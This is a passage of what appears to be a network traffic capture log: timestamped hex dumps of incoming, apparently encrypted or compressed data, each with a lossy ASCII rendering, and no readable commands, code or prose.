                                                                    2023-02-04 02:57:08 UTC92INData Raw: 0c 59 bb 49 94 6f 62 cd 17 e7 89 aa 56 12 28 5b 6a 3f 3d 8e a8 b7 09 92 bf dd 4f 32 28 e2 01 2d 5f 65 30 db 92 ab 80 42 d4 2d b5 64 cb 45 cc 3a b5 7c 16 72 1f 15 e3 7c 3c 97 2d 26 71 d8 eb 93 e1 91 d4 30 25 ce 37 ef 10 41 32 9d e2 28 24 81 1a 3a 06 ee 1a 82 86 a6 75 a5 52 6b 49 c7 ab 87 42 dd 73 cc a1 a9 5c 73 3e d7 d5 2e 8f 2b a1 38 52 9a b0 22 ac 1a 1f 4e 49 c8 29 3c 00 9e 98 02 1a 51 eb 7c 0b 7e ab 64 5a 90 d6 88 a1 5d 58 1a 38 7a ca 01 1d a1 ec a1 ac 59 7d ae d0 8e e6 4d d7 04 df 83 84 1f 87 02 04 6a 26 6a 5b 86 60 b9 d1 5c 24 32 51 2a 77 a5 50 62 f4 63 ec 76 a6 1f 7d 7d 65 be 4c b7 bd df 51 3a 3a 40 0f 67 0e 48 98 50 e3 0a 12 c4 33 d9 4e 7e a2 7f 64 65 3a 86 8d ca 81 a9 ad cb fa b4 09 92 18 83 37 a6 9f 9b ba 77 90 5e 75 f1 d2 33 a8 c1 eb 18 a3 6f 81
                                                                    Data Ascii: YIobV([j?=O2(-_e0B-dE:|r|<-&q0%7A2($:uRkIBs\s>.+8R"NI)<Q|~dZ]X8zY}Mj&j[`\$2Q*wPbcv}}eLQ::@gHP3N~de:7w^u3o
                                                                    2023-02-04 02:57:08 UTC93INData Raw: a9 03 ae cf 5a 1a 50 30 44 8b b7 c3 68 af b2 d2 b0 ba ad a6 cf 22 77 a7 7a 99 3f fb ea 64 67 e4 a3 30 18 ae 9a ab 98 b8 e7 7d 9b 6a 1d b4 37 04 92 da a6 b1 5b 1c de 6c 47 94 9e 32 6a 39 56 71 5a 35 88 7e ef 05 c9 65 13 18 ad 15 86 d6 4b 4c 78 41 ac 5e 33 c8 49 71 fb fc cd 03 59 17 94 5c 26 bb d1 30 71 bb b2 74 71 63 37 8d 3c 93 36 29 bc 6f eb c1 07 ae c3 c8 31 d1 4a 74 56 f1 8b 69 41 42 9d fd e0 89 5e 6e 35 a5 48 a2 6d 8f f0 0c dc 7f 4a 17 50 3b 72 e5 b3 ed 1b d4 1b 9e 82 61 9e 1d 89 f5 d5 91 d2 fb bb 80 80 17 ff b8 ac ef a0 24 24 e9 05 da 48 d7 93 90 63 ed 3b 82 78 86 f4 9b d4 c7 17 db 95 b9 17 8f 29 ae f1 36 42 03 3b 5c c6 a0 66 a5 44 25 ca a9 c8 1c d5 84 2b 0f 70 61 3b 2c 09 fb 6d 30 93 18 0f ec b5 36 5f 74 24 c1 df a5 d2 38 7a f6 26 2c f7 1b fb 7b 8a
                                                                    Data Ascii: ZP0Dh"wz?dg0}j7[lG2j9VqZ5~eKLxA^3IqY\&0qtqc7<6)o1JtViAB^n5HmJP;ra$$Hc;x)6B;\fD%+pa;,m06_t$8z&,{
                                                                    2023-02-04 02:57:08 UTC95INData Raw: c2 c2 a2 e4 b0 85 dc 9f 71 95 97 fe cb e9 ba 69 4d ef 84 5c 1d ec e2 06 e7 bd 3f f1 56 c2 e4 9b 10 08 5e 65 77 3b 1f 9e 25 9b 0e 87 fb 9a ee 84 14 d2 d4 15 56 25 6b 53 c6 26 be 8a c0 eb 4c 90 ee c3 51 3f 66 d6 a0 f8 82 7d 1d 1b 9a c4 a0 e3 f7 22 bd ab 28 9e dd ea a3 82 de 64 2e 9a c8 37 36 67 34 4f 52 78 ca 42 db d7 fd 27 f1 7b b7 7f 38 79 8c 85 32 cd 6d 26 d5 e3 d0 62 60 5d 41 41 96 a1 6f f0 11 83 23 bf 9b b0 90 36 84 ae 28 ea 9d 86 4d 6d 72 be b8 a3 82 eb e3 7e db 21 79 8f 6f 82 4e 2e eb 0a a7 ff 80 4e 30 6f 4c 14 7a 71 ee d2 f7 36 c3 b5 92 5d 4e 11 f9 34 07 66 7f 46 d1 8f b1 b0 1c 8a 23 cc 42 e0 58 e9 68 97 0f 2e 52 23 0d fd 73 33 a8 03 17 75 cd c4 9c fb ed b6 76 47 d2 4a c2 1f 12 35 c9 f1 2e 33 e2 34 1a 16 8d 18 91 8b 88 05 91 2f 72 11 ab e7 92 0b f9
                                                                    Data Ascii: qiM\?V^ew;%V%kS&LQ?f}"(d.76g4ORxB'{8y2m&b`]AAo#6(Mmr~!yoN.N0oLzq6]N4fF#BXh.R#s3uvGJ5.34/r
                                                                    2023-02-04 02:57:08 UTC96INData Raw: 99 51 f4 0b 6b 8a 16 c7 7f 65 82 5b 4a 04 2c 8c 84 c6 e7 ef e3 87 a8 e7 43 d0 7f bc 25 f5 9d 87 8b 41 84 72 36 f2 d1 0e f0 e2 ef 48 dc 1e e8 d9 07 e3 1a 65 ee 68 b4 50 40 b7 42 a4 f6 d8 dd fc b7 eb ad 59 38 2f b1 8d 25 5d c3 04 24 53 db 27 3b 4b 33 c1 0a e0 75 ea a7 92 b3 1c 84 4f 20 56 2d 4a 73 2c 70 7b e1 62 81 7a de 51 ef 3c d8 18 19 ab 82 4a 31 f5 09 cc 23 eb 2d 20 33 9b 96 9d 45 31 ee f8 8f b3 21 ff 77 c5 71 4c 80 79 ae 0d 1e f8 f4 91 bb a8 ed 2a 4a 24 ac 08 e4 be 10 98 bd 2f 6f 5f 21 11 8e d4 86 00 87 83 ea d5 f6 f8 bf db 78 0e f1 4e 9d 29 ea bc 7b 60 b6 94 31 2a d7 a0 f5 ba cd fb 7f aa 5a 15 e3 19 32 aa f8 d9 8c 09 06 e7 31 4f 9f ed 58 67 1c 59 7e 16 65 8f 10 d4 18 d3 67 1c 3c e9 0d 86 c1 70 4e 2e 6d a9 49 49 fa 4f 50 a1 f8 d8 1d 1c 21 97 76 50 a4
                                                                    Data Ascii: Qke[J,C%Ar6HehP@BY8/%]$S';K3uO V-Js,p{bzQ<J1#- 3E1!wqLy*J$/o_!xN){`1*Z21OXgY~eg<pN.mIIOP!vP
                                                                    2023-02-04 02:57:08 UTC97INData Raw: 28 6d f6 8f 68 ab 40 77 ef 8b 88 47 87 b1 36 55 7b 5a 07 03 05 91 23 21 c0 25 05 cb b3 03 38 1f 2f f2 fa bd e8 00 43 87 29 7b 94 00 f4 52 94 56 f7 5e e8 e9 1b fc 0f 3e 4e 9f 6a 92 8d a0 02 f0 c3 8e 6e 30 c2 69 1e 91 4c 53 81 ff 00 81 b8 c9 ed 3d 82 bb 02 84 8b 77 d0 f4 f2 51 fe fb 32 e0 ea 9f 70 a4 0e e5 5c 4a db a4 58 b6
                                                                    Data Ascii: (mh@wG6U{Z#!%8/C){RV^>Njn0iLS=wQ2p\JX
                                                                    2023-02-04 02:57:08 UTC97INData Raw: 73 e6 1a c9 2c b6 f6 ca 90 08 1f c1 39 a0 34 2d 3c f8 f1 b1 90 88 52 1a 1b 78 08 60 41 67 cb 8f b4 dd c1 91 6c 31 d3 22 64 74 57 2f 26 c8 d3 52 45 d0 f6 91 91 cc f2 db c7 63 c6 81 bd e0 df ba 44 7f c9 c4 76 37 d7 e5 5e 89 e2 28 c4 59 f6 95 e6 2a 08 2f 55 61 55 7b df 7d b9 5e c6 94 a4 f9 88 42 ee ae 34 2d 76 0c 0f d9 32 d3 bb d1 c9 63 a7 eb e4 70 38 69 cb 9b de dc 0e 60 27 8e dd ad da c7 2a 95 92 18 f1 a9 ed c6 c7 d7 65 03 80 d4 16 22 01 77 41 0b 02 d8 19 e0 fe c3 35 ae 7b bb 04 0a 0a 81 d7 68 93 2f 2a ec c0 fc 59 7e 45 16 43 9e b8 6a ed 26 8e 47 ea 96 89 fc 0a 84 ad 6f bb 8f b5 58 57 3d e6 ea ac 9b b1 f7 55 a0 31 58 b8 76 9c 78 73 e4 32 d1 c1 ae 42 0c 5f 72 11 75 00 90 95 e5 4e 82 d2 da 11 0a 1a f1 39 7b 67 4c 6a d1 86 ab ff 49 b7 2f a5 72 cc 4b a2 60 da
                                                                    Data Ascii: s,94-<Rx`Agl1"dtW/&REcDv7^(Y*/UaU{}^B4-v2cp8i`'*e"wA5{h/*Y~ECj&GoXW=U1Xvxs2B_ruN9{gLjI/rK`
                                                                    2023-02-04 02:57:08 UTC98INData Raw: 23 aa 39 de 85 a5 5b fd 15 11 4b 1e 3c 31 f7 26 c5 9d 58 60 7c 05 6a 28 be 5e 1d 94 44 db 4a d8 0b 57 19 2c 96 5d be 86 d3 19 7f 70 35 39 59 3a 35 eb 16 c9 27 1e a4 2c a9 4f 74 8d 51 68 46 5e f5 98 8f e2 ed d1 8d eb bd 1a c5 1d fd 1e a0 87 a7 a6 7b aa 78 30 aa fc 7e ff a8 a3 42 ef 36 f4 f8 5c 87 56 16 90 5c b6 51 5d df 69 b7 ef a3 8b db c0 cd 94 2a 6a 6a fe d1 37 48 ee 38 77 48 cd 06 1b 4f 13 d2 26 95 4f d7 bc da dc 13 83 42 07 5f 7f 77 50 32 3c 41 e7 54 f0 42 87 42 b6 33 c5 12 11 ca 83 6f 67 9b 48 c6 63 b0 3a 6a 33 a6 b5 83 09 16 c1 98 af b5 54 c7 4d cc 69 74 b8 75 ad 06 1d c0 dc 81 9a c4 99 00 2f 6d 99 4c 8a 89 72 85 aa 40 7a 19 20 4e d0 e4 89 10 97 a7 a0 e8 d5 e6 f3 db 17 10 a4 74 a5 31 d9 8c 73 10 89 c3 6d 0b e3 e4 dc 90 8a c6 54 f5 1f 58 e4 63 2a a3
                                                                    Data Ascii: #9[K<1&X`|j(^DJW,]p59Y:5',OtQhF^{x0~B6\V\Q]i*jj7H8wHO&OB_wP2<ATBB3ogHc:j3TMitu/mLr@z Nt1smTXc*
                                                                    2023-02-04 02:57:08 UTC100INData Raw: 64 83 79 c5 bd cd 8c c6 d5 e1 d5 88 12 d4 d8 88 ed a5 39 34 95 48 dc 56 d1 f0 ac 30 f5 42 f1 00 bb 84 c5 b5 c7 03 f9 ce df 04 c0 1b d5 fa 0f 7b 39 14 5a 9b 94 74 a6 62 24 c7 8d d4 1f 8a 95 25 5d 60 7e 0a 06 49 ac 00 3f 8c 06 03 df b3 2e 58 0b 19 f3 d6 90 ec 31 6f db 33 49 a8 7b 96 40 85 48 81 01 84 fd 7c f8 6f 09 5f 87 77 b1 f0 8a 17 ff b5 e5 5e 3f 86 60 23 a5 42 3e bf fc 78 da f2 b0 81 1a 86 83 2d af 82 6a f8 ba bd 23 fc fe 25 ef ed c9 42 fa 7e 8d 41 62 81 ca 09 d4 3a df 1c c0 51 8a bb f7 8c 7c 19 b6 6a 8d 2d 23 62 d5 ef a5 82 e9 0c 39 60 2d 59 13 3d 62 ab f4 e5 cb f9 8c 51 4d f8 19 41 67 77 20 0d b2 9c 2e 04 a8 85 fd dd c9 be 82 de 7d c5 f1 eb fa d6 9b 54 25 ed e4 79 19 b8 e2 4a b9 a7 28 f5 2c de c7 9b 17 15 68 53 77 22 53 84 5d d8 1f e1 db a3 ce 91 00
                                                                    Data Ascii: dy94HV0B{9Ztb$%]`~I?.X1o3I{@H|o_w^?`#B>x-j#%B~Ab:Q|j-#b9`-Y=bQMAgw .}T%yJ(,hSw"S]
                                                                    2023-02-04 02:57:08 UTC101INData Raw: a8 64 90 3c 7e e3 55 a4 c5 b5 5d 5f 2d 67 14 49 4d 9b 95 e5 4e 82 c3 a6 09 34 05 f2 12 37 63 52 6a f6 8b ad fa 57 a1 23 b0 6c e3 52 d3 35 a8 71 0c 63 5c 0c df 5c 0e 8d 2b 35 4a 9d dd b6 d4 88 8d 65 54 c5 50 af 6a 68 7b bd d1 2a 61 89 2f 20 13 e6 2a f9 b6 82 4c c4 5e 4b 20 a9 c4 f6 32 cd 0e be 95 8d 77 57 3d ff be 25 a2 28 fe 64 5c cd d2 17 dc 13 62 5c 17 ac 41 26 48 97 b1 1f 08 51 db 46 7c 75 b5 7d 29 f1 b4 c9 f5 5c 63 36 23 7a f5 25 6c c3 8f fa e4 50 7d a6 da ae 99 2f fa 38 89 c9 f3 0e f0 05 2e 67 24 5e 43 9c 5f 93 ae 36 4b 7d 0d 63 71 ab 12 14 f0 7f f5 57 d7 64 3e 69 35 b6 51 97 a3 d7 69 3d 39 3c 32 33 24 53 e0 71 f5 4d 08 c4 5c d5 57 50 a1 5f 64 60 56 81 b3 b0 d6 c2 db 8a 9a 9b 0d 96 61 ae 34 dc c9 c0 d2 10 df 56 62 f0 cd 3e 92 ec e7 20 e9 34 f9 cf 6c
                                                                    Data Ascii: d<~U]_-gIMN47cRjW#lR5qc\\+5JeTPjh{*a/ *L^K 2wW=%(d\b\A&HQF|u})\c6#z%lP}/8.g$^C_6K}cqWd>i5Qi=9<23$SqM\WP_d`Va4Vb> 4l
                                                                    2023-02-04 02:57:08 UTC102INData Raw: 80 b6 4e 3c 24 0d 36 db fc 94 3a 8f e9 a0 e8 d5 e6 f3 c8 0e 2d ac 4a a9 25 f6 b4 79 7f b6 96 37 1e e7 b8 ff b4 8a ea 62 f5 1f 58 e4 63 2a d1 db 86 8d 56 19 8b 29 67 98 d7 27 1b 31 48 15 7b 23 fb 1a f4 3c a2 36 25 6a a0 1e e7 d1 4c 65 4d 3b a7 25 64 c5 6f 10 e0 f9 af 03 62 28 98 7e 24 b8 80 3b 3e fc e5 36 73 7a 00 9e 33 8c 3f 77 99 1d d2 c6 65 a7 f8 de 2d c2 41 43 01 b1 8e 37 0a 36 e7 e8 c1 81 04 53 3d a7 5d d8 7d b3 d7 5e aa 21 22 0e 4b 03 13 84 85 a7 26 ca 26 bd 91 40 a1 18 94 f4 bc ba c0 f7 fc 89 80 10 cb 89 be f2 b9 1f 14 cc 18 e8 4e d1 b4 a2 32 de 13 aa 5a c2 82 cd 90 da 2e e5 9e d0 30 dd 5d e8 af 33 53 35 1f 15 f9 bb 57 8d 63 3b f9 b3 d0 28 ad 9d 27 4f 78 6b 33 0d 42 c9 23 41 92 3a 2c f9 b3 31 4d 54 12 fc ac bf d5 0e 69 ca 0e 41 9e 48 a3 0a 80 58 ba
                                                                    Data Ascii: N<$6:-J%y7bXc*V)g'1H{#<6%jLeM;%dob(~$;>6sz3?we-AC76S=]}^!"K&&@N2Z.0]3S5Wc;('Oxk3B#A:,1MTiAHX
                                                                    2023-02-04 02:57:08 UTC103INData Raw: 93 c2 c1 b3 b4 b5 53 a4 b5 d0 ed c2 b9 6b 6d f5 eb 4a 3e e2 e6 52 91 8e 1a f2 7e c5 e1 b0 50 09 76 4e 77 31 52 8d 4d da 5b be 93 f4 ee b3 17 cd f7 1f 75 29 18 44 8c 19 ce ac aa f8 31 99 ad dd 02 49 51 91 c7 ab 92 0a 25 26 8a a6 b7 d4 d0 22 b3 f4 07 f1 f9 b0 ee 90 b8 7d 02 c6 dd 31 24 6a 3f 18 15 3f 8a 1c c5 a2 d8 29 d0 4b e6 72 21 30 dc b1 3a b6 2f 1e f0 fc cc 5e 7c 1a 44 25 f2 c6 4f d2 78 c9 64 ad 91 97 93 3f a6 84 66 f1 92 de 4f 14 78 8b 90 ce bb e4 bc 0a ba 43 78 96 56 90 39 33 87 08 d8 e4 b9 1d 0e 76 49 14 77 7e c2 da b0 2c 84 b5 af 7e 50 5d e1 37 08 25 70 53 f4 90 b5 ac 79 b7 03 9b 42 d2 42 c0 19 be 26 0d 67 52 79 91 35 5e a9 3b 27 5b c0 ea ae c1 fa ac 76 6d c9 4b ce 16 71 60 97 c6 51 39 b7 61 71 44 9a 66 b9 b0 d4 0e d0 56 59 40 9d 98 96 3a f3 08 8a
                                                                    Data Ascii: SkmJ>R~PvNw1RM[u)D1IQ%&"}1$j??)Kr!0:/^|D%Oxd?fOxCxV93vIw~,~P]7%pSyBB&gRy5^;'[vmKq`Q9aqDfVY@:
                                                                    2023-02-04 02:57:08 UTC105INData Raw: e7 4e 7d 93 59 90 05 07 a4 7c 67 04 21 b9 cd b1 ee d0 a8 ef e4 b0 48 d3 1d a6 13 a4 81 b8 83 0e df 27 27 a6 cb 29 a1 d0 b4 1b c1 2a cf c5 6a ac 40 13 9b 69 93 66 6d 99 26 a6 f4 dd d2 ea b1 c7 82 22 0f 2f a4 a3 0f 76 f8 3a 32 5f c3 04 14 70 5b b7 67 eb 5c d9 9d 8a dd 23 86 4a 25 3b 2c 4e 18 7c 0f 3e e4 42 f0 47 da 4e d1 6c a8 5e 71 a7 84 73 4f a4 7c be 72 d1 34 6e 7f ce a6 d0 14 0b 9c c2 9f e1 07 d8 51 ab 43 1b a3 7a b4 69 03 d3 e4 a8 bf d4 a0 22 77 74 b4 3e ab b9 7b ed d8 36 2f 2d 03 44 e3 fc b4 04 97 93 d0 cc a9 ec da c1 3e 36 94 78 bc 23 db ee 08 29 ff c8 2a 32 a6 b7 ff 8b a2 dd 5c 92 4c 39 85 69 0e 85 c4 d1 95 37 3b ed 29 41 f9 ad 27 06 71 4a 19 1c 0d d6 1b f0 19 f2 3a 7c 3b ac 07 fd aa 19 29 24 7a 80 4a 6c f6 66 60 ce f8 c1 5f 19 08 e9 64 60 88 d6 4a
                                                                    Data Ascii: N}Y|g!H'')*j@ifm&"/v:2_p[g\#J%;,N|>BGNl^qsO|r4nQCzi"wt>{6/-D>6x#)*2\L9i7;)A'qJ:|;)$zJlf`_d`J
                                                                    2023-02-04 02:57:08 UTC106INData Raw: d6 81 53 ae 29 7e fd 94 cb 5a af c3 7e 55 22 5f 69 23 6f c1 6b 3a b6 37 7f 9c f3 78 78 56 23 c9 c3 98 c5 4f 4c f4 5d 52 91 40 8b 7d 9d 5f ab 09 de a2 43 d5 3e 3b 0b de 10 b3 94 8d 09 ca b2 a6 2c 1d b9 54 28 ac 6d 47 ce ae 1e 81 c9 82 87 22 d4 e5 23 b8 a2 40 df f2 f8 6c c4 e1 3d dc c8 ca 56 8c 1b e8 34 0b c5 a4 29 da 19 e4 51 d7 25 a2 da cf 97 24 1e 96 54 af 38 06 4a da aa bb b0 86 15 7d 05 78 79 37 35 7a ce f0 bf ed e8 a3 58 6d c1 25 7e 54 71 10 08 c4 cd 23 47 95 9b c0 8f cc 83 ca b0 51 b1 b0 d2 c2 f6 a4 48 64 fa 80 3e 0d e7 ad 07 a5 a4 0f f9 29 89 ad f2 58 17 53 6f 75 43 51 e7 4e 99 05 f5 fd bd d7 e4 63 f4 d5 1d 7a 0c 5e 73 95 41 89 ce a5 f1 41 9f e8 c6 0d 0a 31 99 cb e6 e1 47 18 06 bd f9 b4 e2 f8 3b 81 b6 50 9e dd ea a3 82 e6 47 50 8d a3 21 18 3b 73 2d
                                                                    Data Ascii: S)~Z~U"_i#ok:7xxV#OL]R@}_C>;,T(mG"#@l=V4)Q%$T8J}xy75zXm%~Tq#GQHd>)XSouCQNcz^sAA1G;PGP!;s-
                                                                    2023-02-04 02:57:08 UTC107INData Raw: 76 f9 49 10 a1 02 11 05 97 87 fa 99 dd 9b 58 4b d2 5f de 16 25 46 c6 fa 3a 01 88 2d 0b 01 ed 37 a6 86 86 71 da 63 19 49 8b ca c2 05 fd 23 b4 8f af 2e 70 25 e7 e4 08 8d 69 82 3e 4c db b0 2c d2 5d 2c 2c 49 84 5c 7a 5f 85 ef 0d 1d 7e de 5a 4d 50 b5 0b 44 b5 bf e1 f2 64 5d 10 54 00 83 63 1d ed a4 e8 b5 78 04 96 cc f5 dd 12 f3 18 fc a2 b0 18 ae 31 24 50 7d 66 31 ca 05 db d1 10 7b 64 14 62 09 d1 77 39 92 6f a8 61 d3 61 5c 7c 59 85 50 be c5 99 19 42 53 2b 75 7b 32 6b d8 69 ce 18 00 c4 13 f5 4c 6f a6 7e 4a 6c 5b b5 c9 b4 f5 db ad 87 a8 e7 43 d0 63 bf 28 d2 a5 8c b5 71 b4 52 74 e9 cb 2c ae c2 b1 5b a9 03 db ff 07 e3 1a 65 ee 68 91 4b 7a 97 7a e4 ea f8 de c4 d4 e3 92 47 05 13 b7 d8 2b 44 c9 3a 2b 3a 8f 53 6b 76 00 dd 37 e4 41 e9 8d ae be 0d 83 5c 28 08 27 3f 01 6c
                                                                    Data Ascii: vIXK_%F:-7qcI#.p%i>L,],,I\z_~ZMPDd]Tcx1$P}f1{dbw9oaa\|YPBS+u{2kiLo~Jl[Cc(qRt,[ehKzzG+D:+:Skv7A\('?l
                                                                    2023-02-04 02:57:08 UTC108INData Raw: 04 c8 6f 61 fd ff 57 3e 78 46 05 4c 37 e5 4c e0 39 d1 6c 18 74 9d 4c 8d e6 78 59 4e 7a a3 60 76 f0 50 1f ab df d4 28 4a 05 85 57 7e b1 c5 71 03 e2 d8 64 05 2f 13 c8 46 b0 22 7a 99 51 ca d1 1e ae eb b6 2f d0 42 09 10 f6 c3 73 5a 41 8f bd de fb 58 6d 32 9f 70 d3 48 a4 fd 2c c2 7c 4a 4d 51 73 25 f3 ed a1 68 ae 1e 81 bf 62 b4 48 8f cd e8 db cf a6 fb bb 80 2b dc b1 8f a2 a0 0c 3a e7 2d 81 78 f3 81 93 21 cb 3c af 72 ba e3 df 89 e0 14 aa fb a3 7f c3 18 c1 a8 63 43 39 20 65 d5 e5 4f d2 41 39 c1 8d fa 43 d5 98 7b 57 66 6d 26 17 73 fa 71 30 89 1e 3b d2 96 2f 68 50 2a ed ce a5 fe 56 08 9d 56 60 8e 0f 95 6b 84 49 fc 0e bc f8 76 e4 20 69 7a bf 16 a3 92 de 12 c5 b8 eb 08 4c ce 62 37 8c 44 34 8b 9c 6c e8 f6 ab 82 02 af b4 04 bf b8 40 97 f5 f4 4f b0 ae 53 8b 9a 88 32 e9
                                                                    Data Ascii: oaW>xFL7L9ltLxYNz`vP(JW~qd/F"zQ/BsZAXm2pH,|JMQs%hbH+:-x!<rcC9 eOA9C{Wfm&sq0;/hP*VV`kIv izLb7D4l@OS2
                                                                    2023-02-04 02:57:08 UTC109INData Raw: 43 6c 51 91 33 dc a3 ad f7 53 aa a8 88 08 7b 23 91 8b db e9 7a 31 16 ac d5 a9 f9 e2 0e b0 93 3b ca f9 f9 ac 99 f0 56 0e c8 af 66 56 6a 73 6f 58 4f ab 4b db e2 ef 0e e6 5d 95 66 69 33 d8 9e 68 b1 6f 19 ea af a3 16 0e 1a 08 5c 96 94 5d e2 33 cd 41 d0 9f 93 c1 0f 89 8a 68 f7 85 86 79 15 51 db f4 91 c9 e4 f0 4e db 48 3b 8d 1c bd 3a 2f e4 3a a2 fa 96 71 3f 52 7f 20 53 53 ec a8 fb 73 d0 b5 e3 11 12 58 a0 44 17 50 4d 46 e4 a5 88 b9 42 d9 2f 9e 19 fa 68 ca 64 8f 29 16 4e 17 2e a4 5c 2a a1 35 34 73 c2 e9 ab e1 c2 f0 77 4d 82 06 b8 1f 63 67 b8 cc 6e 04 a7 2c 0d 17 e1 1a f9 97 90 03 92 3a 08 26 b4 c7 f1 47 ef 14 9a f9 d3 7c 44 34 f6 e1 34 93 38 87 19 6f 9b a3 26 a2 5d 2c 2c 49 84 5b 48 65 9d b8 2d 39 4c ca 52 7c 1a c2 2f 70 f6 c5 cb 83 14 4d 00 54 00 83 63 1d ed 84
                                                                    Data Ascii: ClQ3S{#z1;VfVjsoXOK]fi3ho\]3AhyQNH;:/:q?R SSsXDPMFB/hd)N.\*54swMcgn,:&G|D448o&],,I[He-9LR|/pMTc
                                                                    2023-02-04 02:57:08 UTC111INData Raw: 4b ce 26 7e a4 4e b0 c8 f1 84 8f f0 a2 de 66 13 5e b3 d4 0a 3a f7 64 61 56 d7 02 10 30 11 e8 77 e7 66 89 b6 94 81 23 fb 43 15 20 76 46 1e 5c 07 40 fa 74 d8 75 81 77 f0 38 d0 63 52 b9 c8 5a 52 a0 6e b9 43 cd 0c 14 63 d1 c3 f6 35 76 c6 c0 b7 cd 0e e9 5e eb 07 1e e7 33 e7 28 26 c0 f6 94 91 a5 ed 0f 21 24 a7 4c e3 c8 00 80 b3 46 2d 26 04 2d 8b 8a e0 12 bb a0 d9 8d 82 ba eb c6 3b 43 97 7d a3 39 fe b2 41 4c 8f 9a 2e 0f f5 b0 92 8a 9a c0 7c ac 43 2c a2 1c 37 8e c8 8b da 24 28 cc 1e 44 c6 fd 7a 1f 29 63 2e 2b 32 de 44 d1 2e dd 67 4a 2a f6 2b d1 e3 78 0a 4b 6e aa 77 43 c5 4f 4b f2 d3 ea 1f 4a 71 85 5d 61 9d f9 63 4a be b1 2b 4b 5e 7f c1 72 96 10 6c bc 48 a0 d3 30 bf d3 fb 10 eb 73 7d 01 b2 d2 0a 59 70 ae cd e4 be 0a 5a 1b 91 7a 85 68 b2 c5 03 fc 77 48 0b 69 3a 40
                                                                    Data Ascii: K&~Nf^:daV0wf#C vF\@tuw8cRZRnCc5v^3(&!$LF-&-;C}9AL.|C,7$(Dz)c.+2D.gJ*+xKnwCOKJq]acJ+K^rlH0s}YpZzhwHi:@
                                                                    2023-02-04 02:57:08 UTC112INData Raw: e8 58 1b 55 8a 41 94 c6 a2 3b ca d3 b7 64 1a 96 13 0f 98 64 59 a7 c6 4f d9 d9 8e 95 34 86 b2 1a 93 a9 68 c9 ba f9 7b f9 cc 10 dd d5 8b 62 a3 2e 91 66 66 87 f0 36 95 2f f3 0c c5 32 9e f7 f9 8c 2a 1c 92 79 8e 19 02 6e e3 ef be b8 d5 28 1c 42 21 57 02 0f 65 98 d0 b5 eb c9 b9 4e 70 ed 01 7e 65 27 31 04 89 fa 36 54 c9 d4 b4 d9 81 a2 99 8e 7a f7 b3 ef fa d8 a0 56 67 ee d4 60 2b cc bc 4d ba b5 3a f1 66 cd ad b6 00 12 47 52 47 50 7a cf 6b 83 09 d0 b0 ae fa a4 7b ef f9 25 63 1f 40 5c a8 1b ec 99 c7 cd 66 98 b0 c7 35 3e 78 c5 89 df c2 37 06 2c 98 f5 8f c2 fd 03 a8 b5 08 d0 dd 9e ec 9a fc 49 28 99 fe 24 0c 23 67 6b 36 41 94 49 e1 f2 c4 29 9e 59 bb 40 0b 2f 81 82 3e 8a 0c 3d cf fa 9e 51 48 53 3f 4c bd 9e 4d bd 07 db 57 da cf ad c0 20 8f 8a 7b d5 ae 9e 75 4b 75 92 8c
                                                                    Data Ascii: XUA;ddYO4h{b.ff6/2*yn(B!WeNp~e'16TzVg`+M:fGRGPzk{%c@\f5>x7,I($#gk6AI)Y@/>=QHS?LMW {uKu
                                                                    2023-02-04 02:57:08 UTC113INData Raw: 01 dd e9 1b 90 20 bb 38 08 8e 85 19 b0 2d 49 7b 15 91 48 6b 5c bb b1 11 3a 53 b3 6f 5d 5e b9 21 47 bb ef dd b5 59 68 12 1a 52 f6 32 43 f9 bf f6 e3 4d 2a 94 e8 8a c3 0d fe 3d da f4 a1 48 ac 10 35 76 3b 64 0c b5 69 97 8f 0a 67 7e 1c 22 41 a8 41 29 d1 0e fd 45 9e 06 7d 22 69 b5 1b d3 a5 81 6d 11 27 3b 7a 0a 31 67 d9 7e e9 11
                                                                    Data Ascii: 8-I{Hk\:So]^!GYhR2CM*=H5v;dig~"AA)E}"im';z1g~
                                                                    2023-02-04 02:57:08 UTC113INData Raw: 2f 9f 0f f5 74 5f a4 6c 65 47 0b a4 fe 84 e4 fe cf f8 c4 ab 1d ca 7b a6 25 f3 f1 be a0 56 83 53 61 de d4 29 b0 d1 f0 0b f1 20 81 cf 5f aa 4e 3f a3 7c fe 78 51 8f 4e 89 ce d3 d7 c7 9d 81 a4 72 23 3f b3 88 23 7c cc 24 7f 69 e8 24 2f 77 03 b7 23 b3 59 ef 83 97 88 2e a0 29 17 07 36 28 3b 6a 24 6d e0 59 b3 7a d2 6f df 09 95 39 37 ee aa 72 04 82 5f 80 56 e0 15 30 7a ce 96 ec 1d 21 c9 e9 a8 ec 09 ee 78 f2 3a 71 82 71 be 1a 06 d5 f1 ce a4 f5 b9 09 4b 61 b4 13 bc 9b 46 b9 94 48 36 08 3b 3d c4 c5 81 2c de 86 f8 89 92 9f e7 c9 21 2e a0 70 cf 02 ff b2 51 6d b3 80 39 11 f3 d5 c0 b9 9a c8 5c a6 56 6e f3 5e 09 84 ca 84 89 21 34 cc 39 28 fb fb 70 33 01 7e 32 1a 53 ac 7f c0 2a fb 58 4c 27 fa 03 d5 97 4b 6f 78 6f 9e 5a 6f dd 13 1a 99 c5 ee 0a 4f 24 84 5c 66 df 89 06 6c ba
                                                                    Data Ascii: /t_leG{%VSa) _N?|xQNr#?#|$i$/w#Y.)6(;j$mYzo97r_V0z!x:qqKaFH6;=,!.pQm9\Vn^!49(p3~2S*XL'KoxoZoO$\fl
                                                                    2023-02-04 02:57:08 UTC114INData Raw: 23 e6 1e 45 90 d8 bc 2b e5 fd 53 3e 1b 09 59 76 74 ae 25 0a f9 52 50 1e 09 47 0f 27 79 b9 ad fd b5 27 0c 9e 6a 10 ff 3c e6 0b d1 2d c3 43 eb d8 a7 a8 44 4a 40 f3 23 e0 d4 c3 52 b4 90 c4 88 f6 f1 1d 72 f9 20 07 f2 bc 11 b9 98 e8 cc 42 f9 d2 4a e5 c1 09 bb b0 be 1e 90 86 42 28 02 fb 09 d1 53 d3 1c 19 66 30 59 84 cf b6 63 9c 72 e2 1f 01 e0 5f f1 d6 0c 8b 66 67 1e 81 1b 66 d6 b5 2c 7b 34 c7 cd 49 7a 03 ef 3d 4e 85 be f9 ab e3 8a 6b 1d 12 a7 ff 60 ef 95 66 26 ba f6 c4 aa e3 72 54 fe 14 e5 41 0b 8a 81 f1 a3 f5 9f b7 1c 17 8a d3 35 d8 d0 5b 8c 94 1d ac df 61 60 0a 9c cd 01 1f bc 19 f7 77 3f 91 ca 9f d0 26 bd 9c 57 0d 73 27 32 a9 6d 08 cc 8a 01 de fb df b7 28 7e 1d a9 eb 2a 90 32 54 49 e8 10 ef a8 91 40 df d0 ec 82 db c9 9f e2 08 e5 67 